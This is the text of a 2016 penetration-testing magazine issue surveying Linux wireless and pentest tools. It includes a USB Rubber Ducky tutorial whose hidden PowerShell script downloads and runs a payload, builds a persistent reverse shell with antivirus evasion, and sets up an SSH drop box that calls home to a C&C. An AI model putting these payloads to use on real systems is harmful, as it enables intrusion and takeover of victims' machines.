Sunteți pe pagina 1din 71

ISSN: 2084-1117 03/2016

Managing Editor: Anna Kondzierska 



anna.kondzierska@pentestmag.com

Proofreaders & Betatesters: Lee McKenzie, Kashif Aftab, Jeff Smith, Curtis Mechling, Irfan Akram, AYO
Tayo-Balogun, Avi Benchimol, Christopher Pedersen, Ali AYDIN, Daniela, Matthew Sabin, K S Abhiraj,
Ivan Gutierrez Agramont, Pierre-E Bouchard, Laney, Dave Bohm, Gilles L., Avi Benchimol, Blake
Shearer,

Special thanks to the Betatesters & Proofreaders who helped with this issue. Without their assistance
there would not be a PenTest Magazine.

Senior Consultant/Publisher: Pawel Marciniak 


CEO: Joanna Kretowicz



joanna.kretowicz@pentestmag.com

DTP: Anna Kondzierska

Publisher: Hakin9 Media Sp.z o.o. SK 02-676 Warsaw, Poland



ul. Postepu 17D

Phone: 1 917 338 3631 www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no
warranty, express or implied, concering the results of content usage. All trade marks presented in the
magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold
no responsibility for misuse of the presented techniques or consequent data loss.

1
Contents

Wireless Penetration Testing Tools for Linux



4
by Gerard Johansen

Linux Penetration Testing



13
by Mayur Agnihotri


Kali Linux Rubber Ducky



24
by Sam Vega

What is hardering? And why i need it?



36
by Junior Carreiro


Netcat with - Hacking Backdoors



44
by Dhamu Harker

Cracking WPA2 via Pixie dust attack



50
by Jose Rodriguez

Linux Security - Best practise



61
by Ragul Balakrishan

Weak points MDDoS protection



66
by Tomasz Krupa

2
Dear PenTest Readers,
We would like to proudly present you the newest issue of PenTest. We hope that you will find many
interesting articles inside the magazine and that you will have time to read all of them.

We are really counting on your feedback here!

In this issue we discuss the tools and methods that you can find useful while doing penetration tests
in Linux system. We will show you tools specifically for wireless assessments and show you how to
crack WPA/WPA2-PSK via Pixie-dust attack. You will find articles about looking for vulnerabilities in
Cloud base Security Providers framework, using USB Rubber Ducky with Simple Ducky Payload
Generator and many more.

The main aim of this issue is to present our publication to a wider range of readers. We want to share
the material we worked on and we hope we can meet your expectations. With free account you have
access to all the teasers and open issues, but we fully believe that you’d like to take this one step
further and enjoy our publications without limits. Our premium subscription contains access to our
whole archive.

The virtual doors to our library are open for you!

We’ve already started preparing the next issues of PenTest, which are going to be about Writing an
effective penetration testing report and Security Audit Methodologies. If there is a methodology you
would like to write about or you are a company which wants a professional product review - contact
us!

We would also want to thank you for all your support. We appreciate it a lot. If you like this
publication you can share it and tell your friends about it! every comment means a lot to us.

Again special thanks to the Beta testers and Proofreaders who helped with this issue. Without your
assistance there would not be a PenTest Magazine.

Enjoy your reading,


PenTest Magazine’s
Editorial Team
Wirelss Penetration
Testing Tools for Linux
by Gerard Johansen

Wireless networks permeate all facets of how we interface with technology.


From accessing the internet at our favorite coffee shop, to countless conference
rooms in the business world to our own homes, we are constantly interfacing
with wireless networks. Adding to this ubiquity is the rapidly approaching
Internet of Things. This explosion in wireless networking has made it easier for
people to communicate and control those devices that make everyday tasks
more efficient. Underneath this increased functionality are some glaring
vulnerabilities. Credentials passed in clear text, users connecting to a fake
access point, or brute force attacks that are able to identify the wireless
password all represent a significant risk.

Gaining insight into the risk, and possible vulnerabilities into wireless networks, is critical to ensuring
that the information we pass through these radio signals are not compromised.
To this aim, there are countless tools available for the security professional to assess wireless networks
and take the appropriate steps to secure them. While there are countless tools available, some of the
most common and useful can be utilized within the Linux Operating System.

Adding tools specifically for wireless assessments and penetration testing to a chosen Linux OS has
several advantages. First, many of the tools will not function on other operating systems due to
hardware or software capability issues. Second, the Linux OS, due to its open nature allows for greater
customization of how tools interact. Finally, the majority of these tools are written for the Linux OS and
function best on that platform. All of the following tools can be run on most flavors of Linux;
additionally, these tools are all open source.

Gear
Before we discuss some of the common tools for wireless assessment and penetration testing, there
are some back-end tools that are needed. The first is an external antenna. This is handy to have as
most of the internal wireless cards will not allow you to utilize these tools to their fullest extent. Also, 

if you are running a virtual machine, a USB antenna will save you the trouble of attempting to configure
a wireless connection through the host OS.

4
For external antennas, there are several options. When selecting an antenna, it is recommended that
you use an antenna that makes use of either the Ralink RT3070 or Atheros AR9271 chipset. These
chipsets are reliable and allow for the full use of the tools that will be discussed. These chipsets can
easily be found in antennas that are priced from $15 USD for a TP-Link antenna to a little more than
$30 USD for an Alpha USB wireless Antenna. Some of these even allow for different types of antennas
that will increase the range of your toolset.

Below is the author’s TP-Link antenna that utilizes the Atheros Ar9271 chipset:

Command line tools


The first set of tools that are useful for wireless assessment and penetration testing, are tools that run
from a command line. Those familiar with the Kali Linux OS may recognize some of these tools as part
of this package. The main advantage of these tools is their relative easy of use and the ability to apply
them to a specific type of assessment or test that is being conducted.

The first of these tools is Aircrack-ng. (Available at www.aircrack-ng.org/).


This suite of command line tools is specifically crafted for conducting wireless security assessments
and penetration testing. The variety of components within the suite allow for a wide range of actions
that testers will encounter when testing wireless networks. In short, the tools set allows for:

− Capturing packets form target networks. Attacks such as brute forcing the Pre-Shared Key for
WPA/WPA2 networks and brute forcing the WEP Key require the tester to capture traffic to, and
from, the wireless access point undergoing testing. The Airodump-ng feature of Aircrack-ng
allows for this communication to be captured and saved for further offline analysis.
− Once you have captured the key exchange, Aircrack-ng allows for the offline brute forcing of
WEP/WPA/WPA2-PSKs.
− Packet captures between the access point and a client can be decrypted if a valid four-way
handshake has been captured. The Airdecap-ng tool allows for the decryption of the packets and
allows testers to conduct packet analysis looking for confidential information such as plain text
credentials.

5
− Finally, if the assessment includes looking at clients as opposed to cracking the access point, 

the tool airbase-ng allows for setting up fake access points to conduct the Evil-AP attack and 

to utilize Man in the Middle techniques to obtain sensitive information from the client.

The tools in the Aircrack-ng suite can be considered a Swiss-Army Knife of sorts. There are a great
many tools and features in the suite. While it may seem daunting, working at the command line with
this tool set does help when tools that have a GUI are utilized due to the fact that many of them
currently use the Aircrack-ng suite.

Another excellent tool for cracking WPA-PSKs is coWPAtty. This tool takes a wireless traffic capture
and attempts to ascertain the Pre-Shared Key. The tool makes use of a dictionary file and then try each
one in turn.

The drawback to using coWPAtty is the speed with which this can take place. Due to this, this tools
should be utilized against suspected weak passwords. (Available at https://sourceforge.net/projects/
cowpatty/).

Finally, a good tool to add to the wireless assessment and penetration testing toolbox is pixiewps. 

This tool leverages the flaw found by Dominique Bongard in the Wi-Fi Protected Setup in use by
Access Points and wireless clients. PixieWPS can be utilized to conduct a brute force attack against
the WPS pin in what is known as a “pixie dust attack”. With the use of WPS at the consumer level, it is
a good idea to investigate this type of attack. (Available at
https://github.com/wiire/pixiewps). 


Interactive Tools
The next type of tools that are useful are interactive. These do not have a GUI, but do automate some
tasks and often rely on user input to proceed with actions. These tools are also useful for assessing the
security of wireless networks without necessarily carrying out a full-on penetration test.

The first of these is the tool Kismet. Kismet allows the user to identify wireless networks within range 

of the antenna. Taken with the external antennas discussed before, this allows the assessor to identify
more wireless networks and potential Evil APs. Kismet also has the ability to sniff wireless traffic for
offline analysis. Finally, there is a wireless intrusion detection capability built in. (Available at http://
kismetwireless.net/download.shtml).

A second handy tool is Wifite. Wifite is an easy to use wireless penetration testing tool that takes the
tool set found in Aircrack-ng suite via a python script.

6
Wifite can scan for wireless networks, conduct attacks against WEP/WPA/WPA2 and WPS. Upon
starting Wifite, the user will be shown the wireless access points in range.

The user then has to select a network to attack by entering in the number associated with the access
point under assessment.

Wifite is a fantastic tool if there are time constraints for the assessment or penetration test and the
tester needs to set up something fast. A penetration tester can find the target access point and then
simply conduct a wide range of attacks against it. Wifite also allows for multiple APs to be attacked
simultaneously. This is really handy if the tester has a number of wireless networks to test. (Available
at https://github.com/derv82/wifite).

The designers who came up with WAIDPS call it a Swiss army knife. It is more like a multi-tool to rule
them all. The Wireless Auditing and IPS/IDS is a python script that is designed for the Linux
environment.

7
In short, WAIDPS has several features that are very important to those conducting wireless
assessments and penetration tests:
- The aggregation of data about wireless access points and clients within range of the antenna.
- The automatic capture and saving of wireless packets to a file which allows the assessor to go
back and perform offline packet inspection.

In addition to penetration testing, there are a number of tools and IDS/IPS features that identify
potential attacks. These include ARP request replay attacks, WPS attacks using tools such as Reaver,
and detection of fake APs. Due to the easy of installation, WAIDPS is easily deployed on any Linux
system to monitor the security of wireless systems. (Available at https://n0where.net/waidps-wireless-
auditing-ipsids/).

WAIDS has advantages for those that are undergoing the assessment as well. A WAIDPS instance can
be configured on the network under attack. Then a Red on Blue exercise can be run; where the Red
team attempts to gain access to the wireless network, while the Blue team attempts to locate the
attack attempts using the WAIDPS instance. This way, the assessor or penetration tester can verify 

if the client has the ability to observe the attack and stop it.

GUI Based Tools


Tools that utilize a GUI are based upon the Aircrack-ng suite. Besides the obvious advantage to using
a GUI, when presenting findings to non-technical decision makers, having a GUI really helps in those
complex assessments and penetration tests. One tool that takes the toolset from Aircrack-ng and
places it into an easy to use interface is Gerix Wifi Cracker. (Available https://github.com/TigerSecurity/
gerix-wifi-cracker).

8
Gerix Wifi Cracker allows the user to configure a number of different attacks against wireless networks.
These include cracking WEP/WPA/WPAS, as well as setting up Evil AP attacks. One tool that is very
useful in the suite is the Cracking Feature. This allows for the user to conduct a brute force attack
against the WEP/WPA/WPA2 key utilizing pre-configured rainbow tables, as well as using coWPAtty
together. While this will increase the amount of time necessary to conduct the test, it will be a more
thorough measure of the strength of the key.

9
Other Helpful Tools
In addition to the tools necessary for interacting and assessing the wireless access points, some other
tools can assist the assessor or penetration tester. First is Ettercap. Ettercap has a sniffing tool that
allows penetration testers to sniff network traffic to offline analysis. Part of that tool scans the network
for hosts that can aid in another important feature of Ettercap. This feature is the tool used to conduct
Man in the Middle (MitM) attacks against hosts that are on the wireless network. (Available at https://
ettercap.github.io/ettercap/).

10
Finally, two tools that are critical to any assessment, and specifically to wireless assessments, are
TCPDump and Wireshark. TCPDump is a mainstay in the Liunx OS. This command line tool can be
utilized to capture packets traversing an interface and saved for further examination. Wireshark allows
for the reading of TCPDump packet capture files, but can also be utilized as a packet capture tool in
and of itself. Inspecting packets from a wireless network will give the assessor, or penetration tester, 

a clear idea if confidential information, or credentials, are being passed from a client to the access
point.

Wireless networks will continue to permeate the technology landscape due to their easy of use and
because they significantly reduced the cost of implementation. Assessors and penetration testers
should take every step to ensure that these networks are continually assessed. The tools outlined are
just a sample of the myriad of tools that are available for the Linux OS. Gaining a solid foundation in
these tools will allow the assessor, or penetration tester, to conduct a full spectrum attack against
wireless networks and identify vulnerabilities or configuration errors that could be leveraged by
attackers to gain access to confidential information.

Author: Gerard Johansen


Gerard Johansen is an information security professional
based out of north america. He currently specializes in
penetration testing and incident response. He has worked as
a consultant, security analyst and cyber crime investigator.
Gerard is a frequent speaker on topics and stays involved
with community groups that center on penetration testing and
security issues.

11
12
Linux Penetration
Testing
by Mayur Agnihotri

The Internet has become fraught with danger in the last few years, bad guys
(cyber-criminals) try to damage, intercept, steal, or alter your data. Linux is so
popular because it is a robust OS, and has many advanced security features.
Linux is the preferred OS for those who demand secure networks; however,
because Linux is open source, vulnerabilities can be easily exploited for
malicious intent.

If you used Linux host on the Internet you may hold a different point of view
though. To check what services are currently running on your Linux system.

As we know /etc/inetd.conf file is the default configuration file for the inetd (super-server) daemon, and
it makes system administration work less complex. This file describes many services that are handled
through a configuration file /etc/inetd.conf - like all currently supported QNX Neutrino TCP/IP daemons,
some nonstandard pidin services (and many more) for maximum security should be turned off!
• To check what services are currently running on your Linux system use the command: Netstat

By default, netstat displays a list of open sockets.

The first and most simple command is to list all the current connections. Simply run the netstat
command with the “a” option.

1. netstat -a

This shows all connections from different protocols like tcp, udp, and unix sockets.

For a list of only tcp connections, use the “a” and “t” option like this:

2. netstat -at

Similarly, to list out only udp connections use the “a” and “u” option like this:

3. netstat -au

13
Here, I covered only the basic and most common commands which are used; many more options are
available in netstat commands.

How to Detect Rootkits Under Linux


1. Zeppoo - Zeppoo allows you to detect rootkits on i386 and x86_64 architectures under Linux, by
using /dev/kmem and /dev/mem. Moreover it can also detect hidden tasks, connections,
corrupted symbols, system calls and so many other things. Download source code from here.

2. The Rootkit Hunter Project: 



(Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors, and possible local
exploits. 

To run Rootkit Hunter please install or upgrade to Rootkit Hunter version 1.4.2 and read the README.
• If you have questions about what Rootkit Hunter reports, or if you encounter runtime or
configuration problems, please first consult the Rootkit Hunter installation tutorial (if applicable),
the Rootkit Hunter FAQ and the rkhunter-users mailing list archives.
• If your question is not answered in the FAQ or the mailing list archives, please join (subscribe)
the (to) rkhunter-users mailing list and ask.
• If you would like to be kept informed of updates, we also have a (very) low volume rkhunter-
announce mailing list.
• If you would like to report a bug, downstream (package maintainer) changes or supply a patch:
please use the Rootkit Hunter bug tracker. If unsure please first check on the rkhunter-users
mailing list.
• rkhunter Project Home Page

Chkrootkit - chkrootkit is a tool to locally check for signs of a rootkit. It contains:


• chkrootkit: shell script that checks system binaries for rootkit modification.

• ifpromisc.c: checks if the interface is in promiscuous mode.

• chklastlog.c: checks for lastlog deletions.

• chkwtmp.c: checks for wtmp deletions.

• check_wtmpx.c: checks for wtmpx deletions. (Solaris only)

• chkproc.c: checks for signs of LKM trojans.

• chkdirs.c: checks for signs of LKM trojans.

• strings.c: quick and dirty strings replacement.

• chkutmp.c: checks for utmp deletions.

• chkrootkit Project Home Page

14
Some Linux Network Commands
COMMAND DESCRIPTION
netstat -tulpn Show Linux network ports with process ID's
(PIDs)
watch ss –stplu Watch TCP, UDP open ports in real time with
socket summary.
lsof –I Show established connections.
macchanger -m MACADDR INTR Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 Add IP address to existing network interface in
Linux.
ifconfig eth0 hw ether MACADDR Change MAC address in Linux using ifconfig.
dig -x x.x.x.x Dig reverse lookup on an IP address.
host x.x.x.x Reverse lookup on an IP address, in case
dig is not installed.
dig @192.168.2.2 domain.com -t AXFR Perform a DNS zone transfer using dig.
host -l domain.com nameserver Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x Get hostname for IP address.
ip addr add x.x.x.x/24 dev eth0 Adds a hidden IP address to Linux, does not
show up when performing an ifconfig.
tcpkill -9 host abc.com Blocks access to abc.com from the host
machine.

Some Linux Interesting Files / Dir’s


DIRECTORY DESCRIPTION
/etc/passwd Contains local Linux users.
/etc/shadow Contains local account password hashes.
/etc/group Contains local account groups.
/etc/init.d/ Contains service init script - worth a look to
see whats installed.
/etc/hostname System hostname.
/etc/network/interfaces Network interfaces.
/etc/resolv.conf System DNS servers.
/etc/profile System environment variables.
~/.ssh/ SSH keys.
~/.bash_history Users bash history log.
/var/log/ Linux system log files are typically stored
here.
/var/adm/ UNIX system log files are typically stored
here.

/var/log directory Contains variable data such as system logging files, mail and printer spool directories,
and transient and temporary files. The main problem with log files (logging events) is too much data, so
we need to carefully filter the data. For logging/intrusion detection Tripwire is a cool tool I think because
It takes a snapshot of your important system files and records their signature in a database. You can
also set the rules in a policy file to tell Tripwire what to check.

“Snort”, is another popular program for detecting access attempts. In concluding I must say the system
administrator should review all the log files on a regular basis.

15
Script for Automating Linux Memory Capture and Analysis
To analyze Linux memory, you first need to be able to capture Linux memory. Joe Sylve's Linux Memory
Extractor (LiME) is excellent for  this, but you need to have a LiME module compiled for the kernel of
the system where you want to grab the RAM.

Volatility(TM) is great at analyzing Linux memory images. But it needs a profile that matches the system
where the memory was captured. Building a profile means compiling a C program on the appropriate
system and using dwarfdump to get the addresses of important kernel data structures. You also need a
copy of the System.map file from the /boot directory.

Now if you happen to have a duplicate of your target system, you can build LiME, and compile the
Volatility(TM) profile on the clone and use them to capture and analyze memory from your target. But
there are many situations where a duplicate of your target system is not available. So you may have to
compile LiME and build your Volatility(TM) profile on your target machine.This is not for the faint of
heart. There are a number of steps, and some fairly low-level Linux commands involved. My goal was
to create a package that could be installed (by an expert) on a thumb drive and distributed to agents in
the field. The user of the thumb drive should be able to plug the thumb drive in, run a single
command, and successfully acquire a memory image of the target machine and a working Volatility(TM)
profile. The result is my lmg (Linux Memory Grabber) script.
ON FORENSIC PURITY

==================
If you are a stickler for forensic purity, this is probably not the tool for you. Let us discuss some of the
ways in which my tool interacts with the target system: 

Removable Media -- The tool is designed to be run from a portable USB device such as a thumb drive.
You are going to be plugging a writable device into your target system, where it could potentially be
targeted by malicious users or malware on the system. The act of plugging the device into the system is
going to change the state of the machine

(e.g., create log entries, mtab entries, etc.). If the device is not auto-mounted by the operating system,
the user must manually mount the device via a root shell. 

Compilation -- lmg builds a LiME kernel module for the system. Creating a Volatility(TM) profile also
involves compiling code on the target machine. So gcc will be executed, header files read, libraries
linked, etc. The lmg tries to minimize impact on the file system of the target machine by setting TMPDIR
to a directory on the USB device that lmg runs from. This means that intermediate files created by the
compiler will be written to the thumb drive, rather than the local file system of the target machine.
Dependencies -- In order to compile kernel code on Linux, the target machine needs a working
development environment with gcc, make, etc. and all of the appropriate include files and shared
libraries. In particular, the kernel header files need to be present on the local machine. These

16
dependencies may not exist on the target. In this case, the user is faced with the choice of installing

the appropriate dependencies (if possible) or being unable to acquire memory from the target.
Malware -- lmg uses /bin/bash, gcc, zip, and a host of other programs from the target machine. If the
system has been compromised, the application’s lmg may not be trustworthy. A more complete
solution would be to create a secure execution environment for lmg on the portable USB device;
however, this was beyond the scope of this initial proof of concept.
Memory -- All of the commands being run will cause the memory of the target system to change. The
act of capturing RAM will always create artifacts, but in this case there is extensive compilation, file
system access, etc. in addition to running a RAM dumper.
All of that being said, lmg is a very convenient tool for allowing less-skilled agents to capture useful
memory analysis data from target systems. Note that lmg will look for an already existing LiME module
on the USB device that matches the kernel version and processor architecture of the target machine. If
found, lmg will not bother to recompile. Similarly, you may choose to not have lmg create the
Volatility(TM) profile for the target in order to minimize the impact on the target system.
lmg uses relative path names when invoking programs like gcc and zip. So if you wish to run these
programs from alternate media, simply update $PATH as appropriate before running lmg.
USING LMG

=========
First, prepare a thumb drive according to the instructions in the INSTALL document provided with lmg.
When you wish to acquire RAM, plug the thumb drive into your target system. On most Linux systems,
new USB devices will get automatically mounted under /media. Let us assume yours ends up under /
media/LMG.Now, as root, run "/media/LMG/lmg". This is the interactive mode and the user will be
prompted for confirmation before lmg builds a LiME module for the system and/or creates a
Volatility(TM) profile. If you do not want to be prompted, use "/media/LMG/lmg -y". Everything else is
automated. After the script runs, you will have a new directory on the thumb drive named ".../capture/
<hostname>-YYYY-MM-DD_hh.mm.ss"lmg supports a -c option for specifying a case ID directory
name to be used instead of the default "<hostname>-YYYY-MM-DD_hh.mm.ss" directory. Whatever
directory name is used, the directory will contain:

<hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime -- the RAM capture

<hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip -- Volatility(TM) profile

<hostname>-YYYY-MM-DD_hh.mm.ss-bash -- copy of target's /bin/bash

volatilityrc -- prototype Volatility config file
The volatilityrc file defines the appropriate locations for the captured

memory and plugin. See the USAGE EXAMPLE below for how to use this file.

17
The copy of /bin/bash is helpful for determining the address of the shell history data structure in the
memory of bash processes in the memory capture.

See: http://code.google.com/p/volatility/wiki/LinuxCommandReference23#linux_bash

for further details on how to use this executable (or reference the USAGE EXAMPLE below).
Note that there may be times when you do not wish to write data to the media that you are running lmg
from-- for example if the lmg tools are on read-only media like a DVD-ROM. lmg supports a -d option to
specify a different output directory. By default, all compilation will happen in the target directory, but the
user may specify an alternate compilation directory with -B.
For more detail visit  Halpomeranz 

Awesome Linux Penetration Testing Tools : Vezir-Project, discover, ssh-phone-home.

Vezir-Project 
Yet another Linux Virtual Machine for Mobile Application Pentesting and Mobile Malware Analysis.
The main purpose of the Vezir, is to provide a up-to-date testing environment for mobile security
researchers. Vezir (vizier, chess queen in Turkish) is based on Ubuntu, and it is created with VMWare
Fusion 6.0.4. In order to minimize compatibility issues, Vezir virtual machine is set to use hardware
version 8 and therefore it is compatible with:
• ESXi 5.0
• ESXi 5.1
• Fusion 4.0
• Fusion 5.0
• Fusion 6.0
• Workstation 8.0
• Workstation 9.0
• Workstation 10.0
• Virtualization environments
• Vezir 2.0 uses XFCE desktop environment (Xubuntu) and is based on Ubuntu 15.04
• Update Status:
• Vezir 2.0 latest version is Vezir 2.0.2 and updated on 3 Dec 2015
• Vezir 1.0 latest update on 3 Oct 2015
• Download
• Download Vezir 2.0.2 from the link: https://goo.gl/LfPJkW
• Download Vezir 1.0 older release from the link:https://goo.gl/yuieQf 
• Credentials
• Username: vezir Password: vezir
• Tools
• Eclipse
• Android Studio
• Android SDK
•  (Intentionally removed in Vezir 2.0)
• libimobiledevice library
• BinaryCookieReader
• androguard
• Drozer
• JD-GUI

18
• Jadx
• dex2jar
• Hopper
• (Intentionally removed in Vezir 2.0)
• plutil
• baksmali
• apktool
• sqlmap
• BurpSuite Free
• Wireshark
• sqlite3
• sqlitebrowser
• AXMLPrinter2
• Graphviz Dot
• Doxygen
• Android Log Viewer
• Simplify Deobfuscator
• Genymotion
• Virtualbox
• MFFA (Media Fuzzing Framework for Android)
• Vulnerable Labs (SecurityCompass InsecureBank, OWASP GoatDroid, Pentesterlab SQLi)
• Enjarify
• Apache HTTP server
• BytecodeViewer - planned for future release (https://github.com/Konloch/bytecode-viewer)
All the tools above are put in the /home/vezir/ambar directory. Most of them are added to PATH, so you
can easily run it by just typing the name of the application.
Source:  Vezir-Project 

Discover
For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
Download, setup & usage
git clone https://github.com/leebaird/discover /opt/discover/
All scripts must be ran from this location.
cd /opt/discover/
./update.sh
RECON

1. Domain

2. Person

3. Parse salesforce
SCANNING

4. Generate target list

5. CIDR

6. List

7. IP or domain

19
WEB

8. Open multiple tabs in Iceweasel

9. Nikto

10. SSL
MISC

11. Crack WiFi

12. Parse XML

13. Start a Metasploit listener

14. Update

15. Exit
RECON
Domain
RECON
1. Passive

2. Active

3. Previous menu
Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois,
and multiple websites.
Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

Person
RECON
First name:

Last name:
Combines info from multiple websites.
Parse salesforce

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.

Copy the results into a new file.
Enter the location of your list:
Gather names and positions into a clean list.
SCANNING
Generate target list
SCANNING
1. Local area network

2. NetBIOS

3. netdiscover

4. Ping sweep

5. Previous menu
Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover, and nmap
pingsweep.
CIDR, List, IP or Domain
Type of scan:
1. External

2. Internal

3. Previous menu
External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.

20
Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning, service enumeration, and OS identification.
Matching nmap scripts are used for additional enumeration.
Matching Metasploit auxiliary modules are also leveraged.
WEB
Open multiple tabs in Iceweasel
Open multiple tabs in Iceweasel with:
1. List

2. Directories from a domain's robot.txt.

3. Previous menu
Use a list containing IPs and/or URLs.
Use wget to pull a domain's robot.txt file, then open all of the directories.
Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.

2. List of IP:port.

3. Previous menu

SSL
Check for SSL certificate issues.
Enter the location of your list:
Use sslscan and sslyze to check for SSL/TLS certificate issues.
MISC
Crack WiFi
Crack wireless networks.
Parse XML
Parse XML to CSV.
1. Burp (Base64)

2. Nessus

3. Nexpose

4. Nmap

5. Qualys

6. Previous menu
Start a Metasploit listener
Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.
Update
Use to update Kali Linux, Discover scripts, various tools, and the locate database.
Source: Discover

ssh-phone-home
This project was created in order to quickly create Kali Linux based drop boxes built on inexpensive
hardware such as a Raspberry Pi, to be plugged into a target network during a physical penetration
test.
Anything that runs Kali should work with these scripts just fine.
Description

21
These scripts setup one Kali machine (the drop box) to phone home to another Kali machine (the C&C)
over SSH on port 443. Port 2222 on the C&C is then forwarded to port 22 on the drop box, allowing
you to SSH into the drop box through the reverse tunnel and wreak havoc on... er... pentest the target
network. =P
By default, the drop box will attempt an outgoing SSH connection to port 443 every 5 minutes.
Install Instructions
Install Kali on your main computer (C&C), and your drop box (the one you will leave plugged in to the
target network). As always, be sure to change the root password on both machines so that it is not the
default.
All scripts should be run as root on both machines.
Download the necessary files to each machine (both the drop box and C&C).

cd /opt

git clone https://github.com/Wh1t3Rh1n0/ssh-phone-hom
Modify /opt/ssh-phone-home/phone-home.sh to point to your C&C's IP/hostname.
Example:
CNC_IP=8.8.8.8
Setup the drop box by running the setup script on that machine:
bash /opt/ssh-phone-home/setup-drop-box.sh

 
Copy the drop box's public SSH key to /opt/ssh-phone-home/id_rsa.pub on the C&C. 
scp /opt/ssh-phone-home/id_rsa.pub root@[CNC-IP]:/opt/ssh-phone-home/
Setup the C&C server by running the C&C setup script on that machine:
bash /opt/ssh-phone-home/setup-cnc.sh
This script will make the following changes to your C&C machine:
Create the non-root user "dropbox”, which the drop box will connect as.
Import drop box's public SSH key for SSH login without a password.
Configure SSH to run on port 443 as well as the default port 22.
C&C Command Reference
These commands come in handy after you have everything setup and are working from the C&C server.
Start the SSH service:
service ssh start
Enable SSH service start at boot:
update-rc.d ssh enable
Check for current drop box connections:
netstat -antp | grep ":443.\+ESTABLISHED.\+/sshd"
Watch for incoming drop box connections:
watch 'netstat -antp | grep ":443.\+ESTABLISHED.\+/sshd"'
Close the connection from a drop box.
Where ####/sshd is the PID listed in output from the previous command:
kill ####

22
Login to the drop box:
ssh root@localhost -p 2222
Source: ssh-phone-home

Author: Mayur Agnihotri


(Information Security Enthusiast)

I've done Bachelors of Engineering from Information Technology and


having certifications under my belt like C|EH - Certified Ethical
Hacker ,Cyber Security for Industrial Control Systems, Operational
Security for Control Systems, Advanced Security In The Field, Basic
Security In The Field 

Twitter: @I_AM_Mayur0021

I have 3+ years of experience and loves to spend time find bugs/


vulnerability.

23
Kali Linux Rubber
Ducky
by Sam Vega
In this edition of Pentest Magazine, I decided to write my article on Kali, USB
Rubber Ducky, and the Simple Ducky Payload Generator. I will take it a step
further by utilizing msfvenom to create a custom exe to spawn a reverse shell
and use a custom ducky script to deliver the payload. Why write an article on
this topic? A few weeks back, I was surfing Pluralsight and I stumbled upon 

a video by Troy Hunt and USB Rubber Ducky. He was discussing possible
payloads that can be delivered through the evil HID. As of late, I have been
pondering on ways to educate SMBs on different techniques a simple payload
can be executed in order to infiltrate their business undetected.

This article assumes that you are familiar with Kali Linux and its awesomeness. Now, USB Rubber
Ducky, if you are not familiar with it:

"The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language
allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic
human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/
avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found 

at usbrubberducky.com. Quack!"

README.txt copied from https://github.com/hak5darren/USB-Rubber-Ducky

24
USB Rubber Ducky is a commercial product. It is worth the cash and fun to play with!

We will continue on to the Simple Ducky Payload Generator created by skysploit.

25
The generator can be downloaded at https://code.google.com/archive/p/simple-ducky-payload-
generator/downloads. The version as of this writing is installer_v1.1.1_debian.sh.

Once you download the file onto your Kali system, navigate to the Downloads folder to run the file. You
will need to change the permissions of the file prior to executing, see below. Instructions are also found
on the web page, including YouTube video.

Below is a series of screenshots similar to what you should see during the installation process.

26
27
Now simply type simple-ducky to run the payload generator.

Now for this article I will stick to option #2, since typically our victims will be Windows users. For this
demo I will use a Windows 7 "Persistence Reverse Shell" as the payload.

28
You need to specify if the machine has UAC enabled. In my case it does, so I enter Y.

At the next screen there are more questions to answer: what would you like the username & password
of the newly created admin to be, what IP address to connect the reverse shell to, is UAC enabled?,
etc...

29








30

The success screen is as follows:

At this point you will be asked if you want to set up the ncat listener and if you want to return to the
main menu. I entered Yes to both prompts. As you see below a window opens with the created files,
including the listener on whatever port you specified.

31
Now the next task would be to copy the inject.bin file from /usr/share/simple-ducky to the microSD
card, which will afterwards be inserted into the ducky. The ducky would be inserted into the victim
machine.

What will this payload do exactly? It will create a persistent shell, create a local admin account, drop
the firewall, and enable Remote Desktop/Remote Desktop Assistance.

Now this payload generator is a nifty tool, but what if you want to generate you own payloads for
whatever reason? First you will need the Duck Encoder, which can be downloaded from Hak5 Darren's
Github page (URL near top of article).

So now I will generate my own payload using msfvenom and ducky script.



32




On my Kali machine, I created a 32-bit binary to run on my Windows box using the following command:

Now to create the ducky payload, thanks to Mubix.

GUI R
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://
www.yourwebsite.com/msfducky.old','%temp%\msfducky.exe'); Start-Process "%temp%
\msfducky.exe"
ENTER

Save it as payload.txt. Next the inject.bin file needs to be created, which is saved to the root of the
ducky, the evil HID.

Usage (within Duck Encoder directory): java -jar -i payload.txt -o /media/root/XXXX-XXXX/inject.bin

33
XXXX-XXXX = name Kali gives to your ducky.

With your ducky carrying the payload, all you need to do is insert it into the victim machine. Ducky will
do the rest. :)

Now, see below, how can we take this a step further? On one of my machines running AVG, it picked
up my malicious binaries, but not my malicious DLLs.

34
So what next? Create a ducky script to execute the malicious DLLs. On a Windows box you will
execute the following command to execute the DLL:

C:\Windows\System32 (or SysWOW64)\rundll32.exe %temp%\msfducky.dll,duck

(duck = non-existent function but needed to properly execute the rundll32 command. You can use
anything here such as aaaa)

In order to create the DLL payload, instead of using "-f exe” within msfvenom, you will use “-f dll”.

You might be asking, where is the ducky script? I'll leave that to you ... :)

Author: Sam Vega


Sam has been fiddling with computers for over 20 years but has
been officially an IT professional since 2008. Currently a Senior
